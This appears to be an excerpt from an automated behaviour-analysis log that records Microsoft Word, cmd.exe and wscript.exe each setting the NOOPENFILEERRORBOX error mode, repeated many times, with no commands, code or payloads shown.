Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX |